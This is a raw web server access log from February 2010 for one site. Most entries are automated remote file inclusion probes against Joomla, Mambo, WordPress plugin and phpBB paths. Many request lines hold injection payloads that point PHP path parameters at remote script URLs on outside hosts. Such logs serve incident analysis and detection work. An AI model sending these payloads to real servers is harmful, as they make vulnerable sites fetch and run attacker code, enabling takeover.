74.86.155.18 - - [12/Feb/2010:09:24:21 -0800] "GET /logs/access_100110.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.239.230.130 - - [12/Feb/2010:09:24:41 -0800] "GET /logs///modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://detiinfo.ru//mambots/system/test.txt???? HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
213.239.230.130 - - [12/Feb/2010:09:24:41 -0800] "GET //modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://detiinfo.ru//mambots/system/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.puaga.com"
74.86.155.18 - - [12/Feb/2010:09:25:57 -0800] "GET /logs/access_100120.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [12/Feb/2010:09:26:06 -0800] "GET /logs/access_100125.log/components/com_performs/performs.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [12/Feb/2010:09:26:26 -0800] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [12/Feb/2010:09:26:26 -0800] "GET /logs/access_100115.log%20%20///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [12/Feb/2010:09:26:26 -0800] "GET /logs///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [12/Feb/2010:09:26:46 -0800] "GET /logs/access_100109.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:09:26:58 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:09:26:58 -0800] "GET /logs/access_100203.log%20%20///bbs/write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:09:26:58 -0800] "GET //bbs/write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.63.82.14 - - [12/Feb/2010:09:27:05 -0800] "GET /logs/access_100107.log%20%20///skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [12/Feb/2010:09:27:08 -0800] "GET /logs/access_100203.log//?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [12/Feb/2010:09:27:08 -0800] "GET /logs//?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [12/Feb/2010:09:27:09 -0800] "GET /?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [12/Feb/2010:09:27:27 -0800] "GET /logs/access.log//?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [12/Feb/2010:09:27:48 -0800] "GET /logs/access_100130.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:09:27:48 -0800] "GET /logs/access_100203.log//?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:09:27:48 -0800] "GET /logs//?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:09:27:49 -0800] "GET /?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:09:28:00 -0800] "GET /logs/access_100203.log//?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:09:28:00 -0800] "GET /logs//?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:09:28:01 -0800] "GET /?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:09:28:05 -0800] "GET /logs/access.log//?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:09:28:15 -0800] "GET /logs/access.log//?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [12/Feb/2010:09:28:57 -0800] "GET /logs/access_100130.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:09:29:01 -0800] "GET //bbs/write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:09:29:01 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:09:29:01 -0800] "GET /logs/access_100203.log%20%20///bbs/write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:09:29:01 -0800] "GET /logs/access_100203.log//?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:09:29:01 -0800] "GET /logs//?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:09:29:02 -0800] "GET /?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:09:29:07 -0800] "GET /logs/access_100203.log//?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:09:29:07 -0800] "GET /logs//?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:09:29:07 -0800] "GET /?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:09:29:12 -0800] "GET /logs/access.log//?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [12/Feb/2010:09:29:17 -0800] "GET /logs/access_100203.log//?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [12/Feb/2010:09:29:17 -0800] "GET /logs//?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [12/Feb/2010:09:29:17 -0800] "GET /?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:09:29:20 -0800] "GET /logs/access.log//?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.50.85.229 - - [12/Feb/2010:09:29:47 -0800] "GET /logs/access.log//?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.179.177.169 - - [12/Feb/2010:09:29:57 -0800] "GET /administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.179.177.169 - - [12/Feb/2010:09:29:57 -0800] "GET /logs/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.179.177.169 - - [12/Feb/2010:09:29:57 -0800] "GET /logs/access.log%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [12/Feb/2010:09:30:15 -0800] "GET /logs/access.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.94.194.248 - - [12/Feb/2010:09:30:50 -0800] "GET /logs/access_100123.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.179.6 - - [12/Feb/2010:09:31:25 -0800] "GET /logs///index.php/?_SERVER[DOCUMENT_ROOT]=http://bk.knu.ac.kr/en/bobrok1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.179.6 - - [12/Feb/2010:09:31:25 -0800] "GET /logs/access_100119.log%20%20///index.php/?_SERVER[DOCUMENT_ROOT]=http://bk.knu.ac.kr/en/bobrok1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.179.6 - - [12/Feb/2010:09:31:25 -0800] "GET //index.php/?_SERVER[DOCUMENT_ROOT]=http://bk.knu.ac.kr/en/bobrok1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
69.163.179.6 - - [12/Feb/2010:09:31:30 -0800] "GET /logs/access_100109.log%20%20///index.php/?_SERVER[DOCUMENT_ROOT]=http://bk.knu.ac.kr/en/bobrok1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [12/Feb/2010:09:31:32 -0800] "GET /logs/access.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.181.94.213 - - [12/Feb/2010:09:31:34 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "-" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:09:31:55 -0800] "GET //bbs/write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:09:31:55 -0800] "GET /logs/access_100203.log%20%20///bbs/write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:09:31:55 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [12/Feb/2010:09:32:18 -0800] "GET /logs/access_100123.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.179.177.169 - - [12/Feb/2010:09:33:04 -0800] "GET /logs/access_100119.log%20%20/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.225.178.114 - - [12/Feb/2010:09:34:01 -0800] "GET /logs/?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 200 4799 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.puaga.com"
67.225.178.114 - - [12/Feb/2010:09:34:01 -0800] "GET /logs/?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://giftgives.com/txt?%0D?&u=x HTTP/1.1" 200 4799 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.puaga.com"
67.225.178.114 - - [12/Feb/2010:09:34:01 -0800] "GET /?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 200 3642 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)" "www.puaga.com"
67.225.178.114 - - [12/Feb/2010:09:34:02 -0800] "GET /?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://giftgives.com/txt?%0D?&u=x HTTP/1.1" 200 3642 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.puaga.com"
216.119.103.16 - - [12/Feb/2010:09:34:05 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [12/Feb/2010:09:34:05 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [12/Feb/2010:09:34:05 -0800] "GET /logs/access.log//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:09:34:19 -0800] "GET /logs/access_100203.log%20%20//?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:09:34:19 -0800] "GET /logs//?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:09:34:19 -0800] "GET /?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:09:34:19 -0800] "GET /logs/access_100203.log%20%20//?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:09:34:19 -0800] "GET /logs//?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 4804 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:09:34:20 -0800] "GET /?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [12/Feb/2010:09:34:28 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.alandar.net/www2/img/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [12/Feb/2010:09:34:28 -0800] "GET /logs//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.alandar.net/www2/img/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [12/Feb/2010:09:34:28 -0800] "GET /logs/access.log//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.alandar.net/www2/img/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:09:34:29 -0800] "GET /logs/access.log%20%20//?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
87.106.134.174 - - [12/Feb/2010:09:34:29 -0800] "GET /logs/access.log%20%20//?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.181.94.213 - - [12/Feb/2010:09:35:19 -0800] "GET /ideal/forum/viewtopic.php?p=29084 HTTP/1.1" 404 5258 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:35:32 -0800] "GET /logs/access_100128.log%20%20/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:35:32 -0800] "GET /logs/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:35:32 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [12/Feb/2010:09:36:04 -0800] "GET /logs/access_100118.log//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [12/Feb/2010:09:36:23 -0800] "GET /logs/access_100118.log//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.alandar.net/www2/img/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:09:36:58 -0800] "GET /logs/access_100117.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.delitosinformaticos.gov.co/foro/avatars/.bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:37:28 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:37:34 -0800] "GET /logs/access_100114.log%20%20/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:09:37:44 -0800] "GET /logs//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.delitosinformaticos.gov.co/foro/avatars/.bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:09:37:45 -0800] "GET /index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.delitosinformaticos.gov.co/foro/avatars/.bbs/id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:37:46 -0800] "GET /logs/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:09:37:49 -0800] "GET /logs/access_100117.log%20%20//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.delitosinformaticos.gov.co/foro/avatars/.bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [12/Feb/2010:09:37:52 -0800] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [12/Feb/2010:09:37:52 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
211.180.124.146 - - [12/Feb/2010:09:37:52 -0800] "GET /logs/access.log%20%20//index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [12/Feb/2010:09:37:57 -0800] "GET /logs/access_100103.log//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://qqe.ru/forum//attachments/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.179.177.169 - - [12/Feb/2010:09:38:08 -0800] "GET /logs/access.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.119.103.16 - - [12/Feb/2010:09:38:21 -0800] "GET /logs/access_100103.log//administrator/components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.alandar.net/www2/img/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.179.177.169 - - [12/Feb/2010:09:38:50 -0800] "GET /logs/access_100123.log/administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://www.kyungilcorp.com/board/data/trashi_/sc1?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [12/Feb/2010:09:39:00 -0800] "GET /logs/access_100107.log//index.php?name=PNphpBB2&file=posting&mode=quote/index.php?name=PNphpBB2&file=viewtopic&p=34004/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=http://www.delitosinformaticos.gov.co/foro/avatars/.bbs/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:39:13 -0800] "GET /logs/access_100128.log%20%20/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:39:13 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:39:13 -0800] "GET /logs/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:39:15 -0800] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:39:15 -0800] "GET /logs/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:39:15 -0800] "GET /logs/access_100128.log%20%20/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.179.6 - - [12/Feb/2010:09:39:27 -0800] "GET /logs/access_100119.log///index.php/?_SERVER[DOCUMENT_ROOT]=http://bk.knu.ac.kr/en/bobrok1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.163.179.6 - - [12/Feb/2010:09:39:27 -0800] "GET /logs/access_100109.log///index.php/?_SERVER[DOCUMENT_ROOT]=http://bk.knu.ac.kr/en/bobrok1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
125.141.196.78 - - [12/Feb/2010:09:39:33 -0800] "GET /logs/access_100114.log%20%20/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.37.187 - - [12/Feb/2010:09:39:57 -0800] "GET /labs/ HTTP/1.0" 404 5258 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.187 - - [12/Feb/2010:09:39:58 -0800] "GET /style/polstandard.css HTTP/1.0" 200 5623 "http://puaga.com/labs/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
67.195.37.187 - - [12/Feb/2010:09:39:58 -0800] "GET /style/pngHack.css HTTP/1.0" 200 42 "http://puaga.com/labs/" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
125.141.196.78 - - [12/Feb/2010:09:40:00 -0800] "GET /logs/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://sbfoodmall.co.kr/INIPay/INIpay41/phpexec/s2/s2/copyright.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
